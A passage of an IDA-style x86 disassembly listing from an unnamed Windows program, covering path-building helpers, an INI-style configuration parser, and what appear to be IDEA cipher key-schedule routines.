loc_415934: ; CODE XREF: sub_415867+43�j
; sub_415867+4D�j ...
cmp [ebp+var_1C], 0
jz short loc_415947
movzx eax, [ebp+var_20]
test eax, eax
jnz short loc_415947
mov eax, [ebp+var_1C]
jmp short loc_415966
; ---------------------------------------------------------------------------
loc_415947: ; CODE XREF: sub_415867+D1�j
; sub_415867+D9�j
cmp [ebp+var_34], 0
jz short loc_415964
cmp [ebp+var_1C], 0
jz short loc_415964
mov eax, [ebp+var_34]
mov eax, [eax]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_41BACD
pop ecx
loc_415964: ; CODE XREF: sub_415867+E4�j
; sub_415867+EA�j
xor eax, eax
loc_415966: ; CODE XREF: sub_415867+DE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_415867
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415977 proc near ; CODE XREF: sub_4191AB+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_28], edx
mov [ebp+var_24], ecx
and [ebp+var_8], 0
cmp [ebp+var_24], 0
jz loc_415A50
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz loc_415A50
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jz loc_415A50
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax+1]
cmp eax, 3Ah
jz loc_415A50
mov edi, [ebp+var_24]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_14], ecx
mov eax, ds:dword_424888
add eax, 10h
mov ecx, ds:dword_424888
mov ecx, [ecx+218h]
sub ecx, eax
mov [ebp+var_10], ecx
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_14]
lea eax, [eax+ecx+104h]
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov esi, ds:dword_424888
add esi, 10h
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
inc ecx
mov esi, [ebp+var_24]
mov edi, [ebp+var_8]
add edi, [ebp+var_10]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
loc_415A50: ; CODE XREF: sub_415977+17�j
; sub_415977+26�j ...
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_24]
call sub_41553D
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415AD6
cmp [ebp+arg_0], 0
jz short loc_415AD6
cmp [ebp+var_8], 0
jnz short loc_415A90
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_24]
call sub_41C9BA
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_415A90: ; CODE XREF: sub_415977+FC�j
mov edi, [ebp+arg_0]
mov edx, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_8]
call sub_41553D
mov [ebp+var_4], eax
loc_415AD6: ; CODE XREF: sub_415977+F0�j
; sub_415977+F6�j
cmp [ebp+var_4], 0
jz short loc_415B25
movzx eax, [ebp+var_C]
test eax, eax
jnz short loc_415B25
cmp [ebp+var_28], 0
jz short loc_415B11
cmp [ebp+var_8], 0
jz short loc_415AF8
mov eax, [ebp+var_8]
mov [ebp+var_2C], eax
jmp short loc_415B07
; ---------------------------------------------------------------------------
loc_415AF8: ; CODE XREF: sub_415977+177�j
push 0
push [ebp+var_24]
call sub_41C9BA
pop ecx
pop ecx
mov [ebp+var_2C], eax
loc_415B07: ; CODE XREF: sub_415977+17F�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov [eax], ecx
jmp short loc_415B20
; ---------------------------------------------------------------------------
loc_415B11: ; CODE XREF: sub_415977+171�j
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_41BACD
pop ecx
loc_415B20: ; CODE XREF: sub_415977+198�j
mov eax, [ebp+var_4]
jmp short loc_415B36
; ---------------------------------------------------------------------------
loc_415B25: ; CODE XREF: sub_415977+163�j
; sub_415977+16B�j
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_41BACD
pop ecx
xor eax, eax
loc_415B36: ; CODE XREF: sub_415977+1AC�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_415977 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3D proc near ; CODE XREF: sub_41DDE5+A�p
; sub_41DE13+78�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
push 0
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_41553D
leave
retn
sub_415B3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B59 proc near ; CODE XREF: sub_41DF52+2B�p
; sub_41DFF8+42�p ...
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
; FUNCTION CHUNK AT 0041604B SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4213F0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 64h
push ebx
push esi
push edi
and [ebp+var_34], 0
and [ebp+var_28], 0
and [ebp+var_38], 0
and [ebp+var_20], 0
and [ebp+var_30], 0
and [ebp+var_3C], 0
and [ebp+var_24], 0
and [ebp+var_48], 0
and [ebp+var_40], 0
and [ebp+var_44], 0
and [ebp+var_4], 0
mov ecx, [ebp+arg_10]
xor eax, eax
mov edi, [ebp+arg_C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 0
lea eax, [ebp+var_2C]
push eax
push 0
push 0
push [ebp+arg_14]
call sub_414344
lea eax, [ebp+var_28]
push eax
push [ebp+var_2C]
call sub_414670
mov eax, [ebp+var_28]
inc eax
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_64], eax
mov eax, [ebp+var_64]
mov [ebp+var_34], eax
mov ecx, [ebp+var_28]
inc ecx
xor eax, eax
mov edi, [ebp+var_34]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
lea eax, [ecx+eax+1]
mov [ebp+var_20], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
lea eax, [ebp+var_1C]
push eax
push 0
push 0
push [ebp+var_28]
push [ebp+var_34]
push [ebp+var_2C]
call sub_415175
mov eax, [ebp+var_20]
mov byte ptr [eax-1], 0Ah
jmp short loc_415C42
; ---------------------------------------------------------------------------
loc_415C3B: ; CODE XREF: sub_415B59:loc_416019�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_415C42: ; CODE XREF: sub_415B59+E0�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz loc_41601E
loc_415C4E: ; CODE XREF: sub_415B59+486�j
; sub_415B59+4BB�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Bh
jnz short loc_415C8D
loc_415C59: ; CODE XREF: sub_415B59+125�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz short loc_415C80
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_415C80
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_415C80
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_415C59
; ---------------------------------------------------------------------------
loc_415C80: ; CODE XREF: sub_415B59+106�j
; sub_415B59+111�j ...
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jnz short loc_415C8D
jmp loc_41601E
; ---------------------------------------------------------------------------
loc_415C8D: ; CODE XREF: sub_415B59+FE�j
; sub_415B59+12D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Bh
jnz short loc_415CAB
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_30], eax
mov [ebp+var_24], 1
jmp loc_416019
; ---------------------------------------------------------------------------
loc_415CAB: ; CODE XREF: sub_415B59+13D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Dh
jnz loc_415D54
loc_415CBA: ; CODE XREF: sub_415B59+217�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
cmp [ebp+var_24], 1
jnz loc_415D4F
and [ebp+var_24], 0
cmp [ebp+arg_0], 0
jnz short loc_415D35
mov eax, [ebp+var_44]
mov [ebp+var_4C], eax
mov edi, [ebp+var_30]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_54], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_4C]
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jle short loc_415D33
push [ebp+var_50]
push [ebp+var_30]
mov eax, [ebp+arg_C]
add eax, [ebp+var_4C]
push eax
call sub_410630
add esp, 0Ch
mov eax, [ebp+var_50]
cmp eax, [ebp+var_54]
jle short loc_415D20
mov eax, [ebp+var_54]
mov [ebp+var_74], eax
jmp short loc_415D26
; ---------------------------------------------------------------------------
loc_415D20: ; CODE XREF: sub_415B59+1BD�j
mov eax, [ebp+var_50]
mov [ebp+var_74], eax
loc_415D26: ; CODE XREF: sub_415B59+1C5�j
mov eax, [ebp+var_74]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+1]
mov [ebp+var_44], eax
loc_415D33: ; CODE XREF: sub_415B59+1A0�j
jmp short loc_415D4F
; ---------------------------------------------------------------------------
loc_415D35: ; CODE XREF: sub_415B59+179�j
push [ebp+var_30]
push [ebp+arg_0]
call ds:dword_424740 ; lstrcmpi
test eax, eax
jnz short loc_415D4B
mov [ebp+var_48], 1
jmp short loc_415D4F
; ---------------------------------------------------------------------------
loc_415D4B: ; CODE XREF: sub_415B59+1EA�j
and [ebp+var_48], 0
loc_415D4F: ; CODE XREF: sub_415B59+16B�j
; sub_415B59:loc_415D33�j ...
jmp loc_416019
; ---------------------------------------------------------------------------
loc_415D54: ; CODE XREF: sub_415B59+15B�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_415D6A
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_415D81
loc_415D6A: ; CODE XREF: sub_415B59+204�j
cmp [ebp+var_24], 1
jnz short loc_415D75
jmp loc_415CBA
; ---------------------------------------------------------------------------
loc_415D75: ; CODE XREF: sub_415B59+215�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
jmp loc_416019
; ---------------------------------------------------------------------------
loc_415D81: ; CODE XREF: sub_415B59+20F�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_416019
cmp [ebp+arg_0], 0
jz loc_415FE6
mov eax, [ebp+var_38]
mov byte ptr [eax], 20h
loc_415DA0: ; CODE XREF: sub_415B59+266�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 9
jz short loc_415DB8
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_415DC1
loc_415DB8: ; CODE XREF: sub_415B59+251�j
mov eax, [ebp+var_38]
dec eax
mov [ebp+var_38], eax
jmp short loc_415DA0
; ---------------------------------------------------------------------------
loc_415DC1: ; CODE XREF: sub_415B59+25D�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_415DCE: ; CODE XREF: sub_415B59+292�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 9
jz short loc_415DE4
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_415DED
loc_415DE4: ; CODE XREF: sub_415B59+27E�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_415DCE
; ---------------------------------------------------------------------------
loc_415DED: ; CODE XREF: sub_415B59+289�j
cmp [ebp+arg_4], 0
jnz loc_415F36
movzx eax, [ebp+var_48]
test eax, eax
jz loc_415F31
mov eax, [ebp+var_44]
mov [ebp+var_58], eax
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
cmp eax, [ebp+var_60]
jge short loc_415E34
mov eax, [ebp+var_6C]
mov [ebp+var_78], eax
jmp short loc_415E3A
; ---------------------------------------------------------------------------
loc_415E34: ; CODE XREF: sub_415B59+2D1�j
mov eax, [ebp+var_60]
mov [ebp+var_78], eax
loc_415E3A: ; CODE XREF: sub_415B59+2D9�j
mov eax, [ebp+var_78]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_415E69
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_415E69: ; CODE XREF: sub_415B59+2EB�j
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_415E6F: ; CODE XREF: sub_415B59+33C�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_415E97
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_415E97
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_415E97
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_415E6F
; ---------------------------------------------------------------------------
loc_415E97: ; CODE XREF: sub_415B59+31D�j
; sub_415B59+328�j ...
movzx eax, [ebp+arg_18]
test eax, eax
jz loc_415F23
mov eax, [ebp+arg_10]
dec eax
dec eax
cmp [ebp+var_58], eax
jnb short loc_415EBD
mov eax, [ebp+arg_C]
add eax, [ebp+var_58]
mov byte ptr [eax], 3Dh
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_58], eax
loc_415EBD: ; CODE XREF: sub_415B59+352�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_70], eax
mov eax, [ebp+var_70]
cmp eax, [ebp+var_60]
jge short loc_415EEE
mov eax, [ebp+var_70]
mov [ebp+var_7C], eax
jmp short loc_415EF4
; ---------------------------------------------------------------------------
loc_415EEE: ; CODE XREF: sub_415B59+38B�j
mov eax, [ebp+var_60]
mov [ebp+var_7C], eax
loc_415EF4: ; CODE XREF: sub_415B59+393�j
mov eax, [ebp+var_7C]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_415F23
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_415F23: ; CODE XREF: sub_415B59+344�j
; sub_415B59+3A5�j
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_44], eax
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
loc_415F31: ; CODE XREF: sub_415B59+2A4�j
jmp loc_415FE4
; ---------------------------------------------------------------------------
loc_415F36: ; CODE XREF: sub_415B59+298�j
push [ebp+var_3C]
push [ebp+arg_4]
call ds:dword_424740 ; lstrcmpi
test eax, eax
jnz short loc_415FB1
movzx eax, [ebp+var_48]
test eax, eax
jz short loc_415FB1
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_415F54: ; CODE XREF: sub_415B59+421�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_415F7C
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_415F7C
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_415F7C
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_415F54
; ---------------------------------------------------------------------------
loc_415F7C: ; CODE XREF: sub_415B59+402�j
; sub_415B59+40D�j ...
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+var_3C]
push [ebp+arg_C]
call sub_410630
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+arg_10]
and byte ptr [eax-1], 0
mov edi, [ebp+arg_C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_44], ecx
jmp short loc_41601E
; ---------------------------------------------------------------------------
loc_415FB1: ; CODE XREF: sub_415B59+3EB�j
; sub_415B59+3F3�j ...
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_415FD9
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_415FD9
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_415FD9
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_415FB1
; ---------------------------------------------------------------------------
loc_415FD9: ; CODE XREF: sub_415B59+45F�j
; sub_415B59+46A�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_415C4E
; ---------------------------------------------------------------------------
loc_415FE4: ; CODE XREF: sub_415B59:loc_415F31�j
jmp short loc_416019
; ---------------------------------------------------------------------------
loc_415FE6: ; CODE XREF: sub_415B59+23B�j
; sub_415B59+4B3�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_41600E
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_41600E
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_41600E
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_415FE6
; ---------------------------------------------------------------------------
loc_41600E: ; CODE XREF: sub_415B59+494�j
; sub_415B59+49F�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_415C4E
; ---------------------------------------------------------------------------
loc_416019: ; CODE XREF: sub_415B59+14D�j
; sub_415B59:loc_415D4F�j ...
jmp loc_415C3B
; ---------------------------------------------------------------------------
loc_41601E: ; CODE XREF: sub_415B59+EF�j
; sub_415B59+12F�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_416029
jmp short loc_41604B
sub_415B59 endp
; =============== S U B R O U T I N E =======================================
sub_416029 proc near ; CODE XREF: sub_415B59+4C9�p
; DATA XREF: _4:004213F8�o
mov eax, [ebp-34h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_41BACD
pop ecx
cmp dword ptr [ebp-2Ch], 0FFFFFFFFh
jz short locret_41604A
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-2Ch]
call sub_41473F
locret_41604A: ; CODE XREF: sub_416029+13�j
retn
sub_416029 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_415B59
loc_41604B: ; CODE XREF: sub_415B59+4CE�j
mov eax, [ebp+var_44]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_415B59
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
push dword ptr [ebp-4]
push dword ptr [ebp+8]
mov ecx, [ebp-4]
call sub_416088
mov eax, [ebp-4]
add eax, 68h
push eax
push dword ptr [ebp-4]
mov ecx, [ebp-4]
call sub_416130
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416088 proc near ; CODE XREF: _3:0041606D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
and [ebp+var_8], 0
jmp short loc_41609E
; ---------------------------------------------------------------------------
loc_416097: ; CODE XREF: sub_416088+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41609E: ; CODE XREF: sub_416088+D�j
cmp [ebp+var_8], 8
jge short loc_4160CA
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
shl eax, 8
mov ecx, [ebp+arg_0]
movzx ecx, byte ptr [ecx+1]
add eax, ecx
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx+ecx*2], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
jmp short loc_416097
; ---------------------------------------------------------------------------
loc_4160CA: ; CODE XREF: sub_416088+1A�j
and [ebp+var_4], 0
jmp short loc_4160D7
; ---------------------------------------------------------------------------
loc_4160D0: ; CODE XREF: sub_416088+A2�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4160D7: ; CODE XREF: sub_416088+46�j
cmp [ebp+var_8], 34h
jge short locret_41612C
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov ecx, [ebp+arg_4]
movzx eax, word ptr [ecx+eax*2]
shl eax, 9
mov ecx, [ebp+var_4]
inc ecx
and ecx, 7
mov edx, [ebp+arg_4]
movzx ecx, word ptr [edx+ecx*2]
sar ecx, 7
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [edx+ecx*2+0Eh], ax
mov eax, [ebp+var_4]
and eax, 8
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*2]
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov [ebp+var_4], eax
jmp short loc_4160D0
; ---------------------------------------------------------------------------
locret_41612C: ; CODE XREF: sub_416088+53�j
leave
retn 8
sub_416088 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416130 proc near ; CODE XREF: _3:0041607F�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = word ptr -7Ch
var_78 = dword ptr -78h
var_74 = word ptr -74h
var_70 = word ptr -70h
var_6C = word ptr -6Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push esi
push edi
mov [ebp+var_80], ecx
lea eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_84], ax
push [ebp+var_84]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_416431
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_88], ax
push [ebp+var_88]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_416431
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
and [ebp+var_78], 0
jmp short loc_416207
; ---------------------------------------------------------------------------
loc_416200: ; CODE XREF: sub_416130+1D7�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_416207: ; CODE XREF: sub_416130+CE�j
cmp [ebp+var_78], 7
jge loc_41630C
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_8C], ax
push [ebp+var_8C]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_416431
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_90], ax
push [ebp+var_90]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_416431
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
jmp loc_416200
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_416130+DB�j
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_94], ax
